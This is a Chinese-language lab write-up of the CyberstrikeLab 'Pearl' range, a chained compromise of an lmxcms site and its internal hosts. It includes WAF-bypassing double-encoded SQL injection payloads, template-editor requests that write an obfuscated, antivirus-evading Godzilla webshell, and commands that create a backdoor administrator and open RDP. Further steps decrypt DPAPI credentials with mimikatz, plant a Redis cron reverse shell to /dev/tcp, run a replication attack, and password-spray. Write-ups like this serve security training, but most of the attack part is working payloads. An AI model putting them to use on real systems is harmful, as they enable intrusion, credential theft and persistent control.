Penetration Range WriteUp CyberstrikeLab

CyberstrikeLab-Pearl

Natro922025-02-242025-03-10

192.168.10.65

梦想 cms

lmxcms 代码审计-mvc 架构练手首选 > 梦想 cms（lmxcms）1.41 版本下载_梦想 cms（lmxcms）

mvc 架构：从源码路径 c 和 m 部分可以看出。需要找到路由

有安全狗。得绕过 waf。

双重 url 加密可以绕过。

1'and updatexml(0,concat(0x7e,user()),1)#


%25%33%31%25%32%37%25%36%31%25%36%65%25%36%34%25%32%30%25%37%35%25%37%30%25%36%34%25%36%31%25%37%34%25%36%35%25%37%38%25%36%64%25%36%63%25%32%38%25%33%30%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%31%25%32%39%25%32%33

LMXCMS 网站系统在线手册、教程

找到表名。

# admin
1'and updatexml(0,concat(0x7e,substr((select name from lmxcms.lmx_user),1,50)),1)#
%25%33%31%25%32%37%25%36%31%25%36%65%25%36%34%25%32%30%25%37%35%25%37%30%25%36%34%25%36%31%25%37%34%25%36%35%25%37%38%25%36%64%25%36%63%25%32%38%25%33%30%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%37%33%25%37%35%25%36%32%25%37%33%25%37%34%25%37%32%25%32%38%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%36%36%25%37%32%25%36%66%25%36%64%25%32%30%25%36%63%25%36%64%25%37%38%25%36%33%25%36%64%25%37%33%25%32%65%25%36%63%25%36%64%25%37%38%25%35%66%25%37%35%25%37%33%25%36%35%25%37%32%25%32%39%25%32%63%25%33%31%25%32%63%25%33%35%25%33%30%25%32%39%25%32%39%25%32%63%25%33%31%25%32%39%25%32%33

# 755baa2a3a108001fae12a92b4e0f54
1'and updatexml(0,concat(0x7e,substr((select pwd from lmxcms.lmx_user),1,50)),1)#
%25%33%31%25%32%37%25%36%31%25%36%65%25%36%34%25%32%30%25%37%35%25%37%30%25%36%34%25%36%31%25%37%34%25%36%35%25%37%38%25%36%64%25%36%63%25%32%38%25%33%30%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%37%33%25%37%35%25%36%32%25%37%33%25%37%34%25%37%32%25%32%38%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%30%25%37%37%25%36%34%25%32%30%25%36%36%25%37%32%25%36%66%25%36%64%25%32%30%25%36%63%25%36%64%25%37%38%25%36%33%25%36%64%25%37%33%25%32%65%25%36%63%25%36%64%25%37%38%25%35%66%25%37%35%25%37%33%25%36%35%25%37%32%25%32%39%25%32%63%25%33%31%25%32%63%25%33%35%25%33%30%25%32%39%25%32%39%25%32%63%25%33%31%25%32%39%25%32%33

不是直接 md5 构造的，直接本地跑一个覆盖了。

没事了，弱口令 admin:admin123

代码审计-lmxcms1.4-前后台注入漏洞复现-CSDN 博客

任意文件上传。

模板管理处可以修改 html 文件，想到能否任意文件编辑。

修改抓包：

POST /admin.php?m=Template&a=editfile&dir=default/tags HTTP/1.1
Host: 192.168.10.65
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Cookie: PHPSESSID=kt3s2n6c6ug2iibbml4t8didk7
Accept-Language: zh-CN,zh;q=0.9
Origin: http://192.168.10.65
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.10.65/admin.php?m=Template&a=opendir&dir=default/tags
Accept-Encoding: gzip, deflate
Content-Length: 91

temcontent=%3C%3Fphp+phpinfo%28%29%3B%3F%3E&filename=c.php&settemcontent=%E6%8F%90%E4%BA%A4

访问发现成功写入。

修改写 shell。我这手里尝试的几个都会被 🐶 识别。

GitHub - Tas9er/ByPassGodzilla: 哥斯拉 WebShell 免杀生成 / Code By:Tas9er 能过
网上看到用了个什么 XG 拟态

POST /admin.php?m=Template&a=editfile&dir=default/tags HTTP/1.1
Host: 192.168.10.65
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Cookie: PHPSESSID=kt3s2n6c6ug2iibbml4t8didk7
Accept-Language: zh-CN,zh;q=0.9
Origin: http://192.168.10.65
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.10.65/admin.php?m=Template&a=opendir&dir=default/tags
Accept-Encoding: gzip, deflate
Content-Length: 91

temcontent=%48%65%6c%6c%6f%20%41%64%6d%69%6e%69%73%74%72%61%74%6f%72%21%0a%57%65%6c%43%6f%6d%65%20%54%6f%20%54%61%73%39%65%72%20%47%6f%64%7a%69%6c%6c%61%20%50%48%50%20%43%6f%6e%73%6f%6c%65%21%0a%3c%3f%70%48%50%0a%40%73%65%73%73%69%6f%6e%5f%73%74%61%72%74%28%29%3b%0a%40%73%65%74%5f%74%69%6d%65%5f%6c%69%6d%69%74%28%43%68%72%28%22%34%38%22%29%29%3b%0a%40%65%72%72%6f%72%5f%72%65%70%6f%72%74%69%6e%67%2f%2a%66%75%63%6b%67%6f%76%58%2a%2f%28%43%68%72%28%22%34%38%22%29%29%3b%0a%66%75%6e%63%74%69%6f%6e%20%62%61%69%64%75%6d%35%54%69%75%34%65%52%64%4b%4f%34%49%46%28%2f%2a%66%75%63%6b%67%6f%76%33%70%4b%53%35%7a%5a%61%64%65%52%74%54%77%71%2a%2f%24%62%61%69%64%75%75%36%76%36%64%41%4c%35%49%37%63%6f%7a%2c%24%62%61%69%64%75%61%4b%64%41%4b%29%7b%0a%20%20%20%20%66%6f%72%28%24%62%61%69%64%75%74%35%50%57%36%3d%43%68%72%28%22%34%38%22%29%3b%24%62%61%69%64%75%74%35%50%57%36%3c%73%74%72%6c%65%6e%28%24%62%61%69%64%75%75%36%76%36%64%41%4c%35%49%37%63%6f%7a%29%3b%24%62%61%69%64%75%74%35%50%57%36%2b%2b%29%20%7b%0a%20%20%20%20%20%20%20%20%24%62%61%69%64%75%43%78%32%6c%5a%36%6e%64%67%5a%20%3d%20%24%62%61%69%64%75%61%4b%64%41%4b%5b%24%62%61%69%64%75%74%35%50%57%36%2b%43%68%72%28%22%34%39%22%29%26%31%35%5d%3b%0a%20%20%20%20%20%20%20%20%24%62%61%69%64%75%75%36%76%36%64%41%4c%35%49%37%63%6f%7a%5b%24%62%61%69%64%75%74%35%50%57%36%5d%20%3d%20%24%62%61%69%64%75%75%36%76%36%64%41%4c%35%49%37%63%6f%7a%5b%24%62%61%69%64%75%74%35%50%57%36%5d%5e%24%62%61%69%64%75%43%78%32%6c%5a%36%6e%64%67%5a%3b%0a%20%20%20%20%7d%0a%20%20%20%20%72%65%74%75%72%6e%20%24%62%61%69%64%75%75%36%76%36%64%41%4c%35%49%37%63%6f%7a%3b%0a%7d%0a%24%62%61%69%64%75%74%20%3d%20%22%62%61%73%22%2e%22%65%36%22%2e%43%68%72%28%22%35%32%22%29%2e%22%5f%22%2e%22%64%65%22%2e%22%63%6f%64%22%2e%43%68%72%28%22%31%30%31%22%29%3b%0a%24%62%61%73%65%36%34%5f%62%61%69%64%75%6d%35%54%69%75%34%65%52%64%4b%4f%34%49%46%20%3d%20%22%62%61%73%22%2e%22%65%36%22%2e%43%68%72%28%22%35%32%22%29%2e%22%5f%65%22%2e%43%68%72%28%22%31%31%30%22%29%2e%43%68%72%28%22%39%39%22%29%2e%22%6f%64%65%22%3b%0a%24%62%61%69%64%75%61%6b%64%51%6d%6d%65%35%3d%28%22%26%22%5e%22%72%22%29%2e%28%22%37%22%5e%22%56%22%29%2e%28%22%49%22%5e%22%3a%22%29%2e%28%22%70%22%5e%22%49%22%29%2e%28%22%5f%22%5e%22%3a%22%29%2e%24%62%61%69%64%75%74%28%24%62%61%69%64%75%74%28%22%59%32%63%39%50%51%3d%3d%22%29%29%3b%0a%24%62%61%69%64%75%48%4d%44%70%6d%76%3d%27%70%27%2e%24%62%61%69%64%75%74%28%24%62%61%69%64%75%74%28%22%57%56%68%73%63%32%49%79%52%6d%73%3d%22%29%29%3b%0a%24%62%61%69%64%75%53%6d%72%78%49%45%78%3d%27%34%61%64%39%62%66%39%30%27%2e%24%62%61%69%64%75%74%28%22%4d%6a%55%31%4e%6d%4a%6d%4d%6d%59%3d%22%29%3b%0a%24%62%61%69%64%75%71%39%30%47%4e%37%4f%49%4f%51%50%77%58%58%63%3d%28%22%21%22%5e%22%40%22%29%2e%27%73%73%27%2e%43%68%72%28%22%31%30%31%22%29%2e%27%72%73%27%3b%0a%24%62%61%69%64%75%71%39%30%47%4e%37%4f%49%4f%51%50%77%58%58%63%2b%2b%3b%0a%69%66%20%28%69%73%73%65%74%28%24%5f%50%4f%53%54%2f%2a%66%75%63%6b%67%6f%76%31%53%5a%4b%61%4c%61%37%66%34%61%7a%4c%47%2a%2f%5b%24%62%61%69%64%75%61%6b%64%51%6d%6d%65%35%5d%29%29%7b%0a%20%20%20%20%24%64%61%74%62%61%69%64%75%71%39%30%47%4e%37%4f%49%4f%51%50%77%58%58%63%3d%62%61%69%64%75%6d%35%54%69%75%34%65%52%64%4b%4f%34%49%46%2f%2a%66%75%63%6b%67%6f%76%42%56%74%76%7a%56%7a%72%78%41%65%58%55%2a%2f%28%24%62%61%69%64%75%74%28%24%5f%50%4f%53%54%5b%24%62%61%69%64%75%61%6b%64%51%6d%6d%65%35%5d%29%2c%24%62%61%69%64%75%53%6d%72%78%49%45%78%29%3b%0a%20%20%20%20%69%66%20%28%2f%2a%66%75%63%6b%67%6f%76%42%35%56%37%36%39%69%43%78%6d%78%31%68%4b%2a%2f%69%73%73%65%74%28%24%5f%53%45%53%53%49%4f%4e%2f%2a%66%75%63%6b%67%6f%76%44%62%64%65%39%2a%2f%5b%24%62%61%69%64%75%48%4d%44%70%6d%76%5d%29%29%7b%0a%20%20%20%20%20%20%20%20%24%62%61%69%64%75%75%37%3d%62%61%69%64%75%6d%35%54%69%75%34%65%52%64%4b%4f%34%49%46%28%24%5f%53%45%53%53%49%4f%4e%2f%2a%66%75%63%6b%67%6f%76%78%35%58%66%41%6a%46%63%6d%42%75%76%4c%49%42%2a%2f%5b%24%62%61%69%64%75%48%4d%44%70%6d%76%5d%2c%24%62%61%69%64%75%53%6d%72%78%49%45%78%29%3b%0a%20%20%20%20%20%20%20%20%69%66%20%28%2f%2a%66%75%63%6b%67%6f%76%53%67%68%44%4b%6a%64%62%64%2a%2f%73%74%72%70%6f%73%28%24%62%61%69%64%75%75%37%2c%24%62%61%69%64%75%74%2f%2a%66%75%63%6b%67%6f%76%63%2a%2f%28%24%62%61%69%64%75%74%28%22%57%6a%4a%57%4d%46%46%74%52%6e%70%68%56%30%35%36%55%31%63%31%62%57%4a%33%50%54%30%3d%22%29%29%29%3d%3d%3d%66%61%6c%73%65%29%7b%0a%20%20%20%20%20%20%20%20%20%20%20%20%24%62%61%69%64%75%75%37%3d%62%61%69%64%75%6d%35%54%69%75%34%65%52%64%4b%4f%34%49%46%2f%2a%66%75%63%6b%67%6f%76%4f%58%33%77%2a%2f%28%24%62%61%69%64%75%75%37%2c%24%62%61%69%64%75%53%6d%72%78%49%45%78%29%3b%0a%20%20%20%20%20%20%20%20%7d%0a%09%09%64%65%66%69%6e%65%28%22%62%61%69%64%75%4a%6d%74%74%49%50%22%2c%22%2f%2f%62%61%69%64%75%48%49%4a%5c%72%5c%6e%22%2e%24%62%61%69%64%75%75%37%29%3b%0a%09%09%24%62%61%69%64%75%71%39%30%47%4e%37%4f%49%4f%51%50%77%58%58%63%28%62%61%69%64%75%4a%6d%74%74%49%50%29%3b%0a%20%20%20%20%20%20%20%20%65%63%68%6f%20%73%75%62%73%74%72%28%2f%2a%66%75%63%6b%67%6f%76%6f%2a%2f%6d%64%35%2f%2a%66%75%63%6b%67%6f%76%61%7a%37%34%2a%2f%28%24%62%61%69%64%75%61%6b%64%51%6d%6d%65%35%2e%24%62%61%69%64%75%53%6d%72%78%49%45%78%29%2c%43%68%72%28%22%34%38%22%29%2c%31%36%29%3b%0a%20%20%20%20%20%20%20%20%65%63%68%6f%20%24%62%61%73%65%36%34%5f%62%61%69%64%75%6d%35%54%69%75%34%65%52%64%4b%4f%34%49%46%28%62%61%69%64%75%6d%35%54%69%75%34%65%52%64%4b%4f%34%49%46%28%40%72%75%6e%28%24%64%61%74%62%61%69%64%75%71%39%30%47%4e%37%4f%49%4f%51%50%77%58%58%63%29%2c%24%62%61%69%64%75%53%6d%72%78%49%45%78%29%29%3b%0a%20%20%20%20%20%20%20%20%65%63%68%6f%20%73%75%62%73%74%72%28%2f%2a%66%75%63%6b%67%6f%76%6f%31%63%66%32%49%47%2a%2f%6d%64%35%2f%2a%66%75%63%6b%67%6f%76%71%4c%4f%49%4d%72%54%43%2a%2f%28%24%62%61%69%64%75%61%6b%64%51%6d%6d%65%35%2e%24%62%61%69%64%75%53%6d%72%78%49%45%78%29%2c%31%36%29%3b%0a%20%20%20%20%7d%65%6c%73%65%7b%0a%20%20%20%20%20%20%20%20%69%66%20%28%73%74%72%70%6f%73%2f%2a%66%75%63%6b%67%6f%76%6c%36%64%2a%2f%28%24%64%61%74%62%61%69%64%75%71%39%30%47%4e%37%4f%49%4f%51%50%77%58%58%63%2c%24%62%61%69%64%75%74%28%24%62%61%69%64%75%74%28%22%57%6a%4a%57%4d%46%46%74%52%6e%70%68%56%30%35%36%55%31%63%31%62%57%4a%33%50%54%30%3d%22%29%29%29%21%3d%3d%66%61%6c%73%65%29%7b%0a%20%20%20%20%20%20%20%20%20%20%20%20%24%5f%53%45%53%53%49%4f%4e%5b%24%62%61%69%64%75%48%4d%44%70%6d%76%5d%3d%62%61%69%64%75%6d%35%54%69%75%34%65%52%64%4b%4f%34%49%46%28%24%64%61%74%62%61%69%64%75%71%39%30%47%4e%37%4f%49%4f%51%50%77%58%58%63%2c%24%62%61%69%64%75%53%6d%72%78%49%45%78%29%3b%0a%20%20%20%20%20%20%20%20%7d%0a%20%20%20%20%7d%0a%7d%0a%3f%3e%0a&filename=t.php&settemcontent=%E6%8F%90%E4%BA%A4

1 2	http://192.168.10.65/template/default/tags/t.php Tas9er 8q5w8WzWhH

查看数据库账号密码。

就俩安全狗简单来个免杀上 cs。

sweetPotato 提权。

拿到 flag1：

创建用户

1 2	net user natro92 N4tro92 /add net localgroup administrators natro92 /add

处理下 RDP 可以用直接用 cs 插件

1
2

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

fscan 扫出 192.168.10.42 的弱口令：root:123456

flag3

查看本地 rdp 链接记录：

1
2
3

cmdkey /list
# 查找本地Cred
dir /a %userprofile%\appdata\local\microsoft\credentials\*

直接用 mimikatz 读：

1	mimikatz dpapi::cred /in:C:\Windows\system32\config\systemprofile\appdata\local\microsoft\credentials\F7A11901B817E047275D06BDB5BAF712

找到对应 guidMasterKey {9ffb8fdd-ee67-46e6-a0b5-acaa65d37581}

1	mimikatz sekurlsa::dpapi

对应 MasterKey：

1	d66ec675b7789d8c929b9d887b63b8cdcdb0607b0ef6af226865964125c83e31608db9a7495a126ed80f04f854a4ff3c1393da53fe64e1080b2b10e2d933ee38

解密文件：

mimikatz dpapi::cred /in:C:\Windows\system32\config\systemprofile\appdata\local\microsoft\credentials\F7A11901B817E047275D06BDB5BAF712 /masterkey:d66ec675b7789d8c929b9d887b63b8cdcdb0607b0ef6af226865964125c83e31608db9a7495a126ed80f04f854a4ff3c1393da53fe64e1080b2b10e2d933ee38

得到 rdp 凭据中的明文密码：Lmxcms@cslab! 也就是 Administrator 的密码。

根目录下有 rdp 文件，rdp 登录后使用：（注意是本地 rdp 用 Administrator 登录，而不是凭据），得到 flag3：

stowaway 搭建代理。

# admin
windows_x64_admin.exe -l 172.16.233.2:9000 -s 123
# 链接
windows_x64_agent.exe -c 172.32.50.22:9000 -s 123 --reconnect 8

use 0
socks 2000
back
use 1
socks 2001

flag4

能写计划任务。

redis 未授权反弹 shell 的三种方式 - Saint_Michael - 博客园

没有.ssh 目录，那就只能做计划任务了

config set dir /var/spool/cron/
config set dbfilename root
set shell "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/10.0.0.65/7777 0>&1\n\n"
save

不知道为什么没成功。

主从复制

GitHub - 0671/RabR: Redis-Attack By Replication (通过主从复制攻击 Redis)

用 stowaway 上传一下。再传个 python 安装包。这个 RabR 无需其他的 pip 库就能直接用。

1	upload D:\Wxxx\RabR.zip RabR.zip

1	python redis-attack.py -r 10.0.0.56 -L 10.0.0.65 -b

flag5

还有一个 10.0.0.23 的机器：

外面 proxifer 直接全部走代理 wsl 直接 virtioproxy 模式直接执行命令：

crackmapexec smb 密码喷洒

1	crackmapexec smb 10.0.0.23 -u Administrator -p 1.txt

administrator:qwe!@#123

或者 psexec 链接

1	impacket-psexec Administrator@10.0.0.23